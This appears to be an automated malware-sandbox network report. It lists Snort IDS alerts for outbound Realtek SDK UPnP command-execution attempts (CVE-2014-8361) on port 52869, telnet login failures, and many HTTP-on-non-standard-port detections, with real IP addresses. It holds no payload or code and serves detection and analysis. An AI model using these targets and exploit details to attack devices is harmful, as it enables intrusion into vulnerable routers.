Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53854 -> 185.216.249.118:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54660
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54660
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51668
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35288 -> 45.195.155.138:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35288 -> 45.195.155.138:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57052 -> 45.122.136.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57052 -> 45.122.136.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54176 -> 185.71.67.249:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54176 -> 185.71.67.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54178 -> 185.71.67.249:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37188
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37188
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51702
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48154 -> 45.42.83.36:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48154 -> 45.42.83.36:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39102 -> 45.248.71.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39102 -> 45.248.71.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39108 -> 45.248.71.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36808 -> 45.121.57.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36808 -> 45.121.57.70:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54700
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54700
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32916
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51744
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42492 -> 45.115.230.163:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42492 -> 45.115.230.163:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42500 -> 45.115.230.163:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.163.50.184:23 -> 192.168.2.23:40928
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54742
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54742
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51776
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59916 -> 45.154.3.97:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59916 -> 45.154.3.97:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59582 -> 45.248.69.255:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59582 -> 45.248.69.255:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60810 -> 91.200.120.134:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59598 -> 45.248.69.255:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32972
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49310 -> 45.42.86.91:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49310 -> 45.42.86.91:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37088 -> 45.254.24.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37088 -> 45.254.24.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43948 -> 185.131.77.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43948 -> 185.131.77.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43960 -> 185.131.77.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33222 -> 45.152.216.146:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33222 -> 45.152.216.146:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40054 -> 45.33.248.247:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40054 -> 45.33.248.247:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37098 -> 45.254.24.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33234 -> 45.152.216.146:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54780
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54780
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37282
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37282
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:40428
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:40428
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51852
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51886
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33028 -> 45.43.233.236:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33028 -> 45.43.233.236:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54250 -> 185.37.99.247:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54250 -> 185.37.99.247:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54256 -> 185.37.99.247:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49392 -> 45.41.82.254:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49392 -> 45.41.82.254:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:33104
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37422
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37422

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36884 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36826
Source: unknown	Network traffic detected: HTTP traffic on port 36830 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36830
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53786 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 53786
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44066 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58022 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46228 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36066 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36068 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36066
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36068
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50650 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53970 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53976 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54542 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
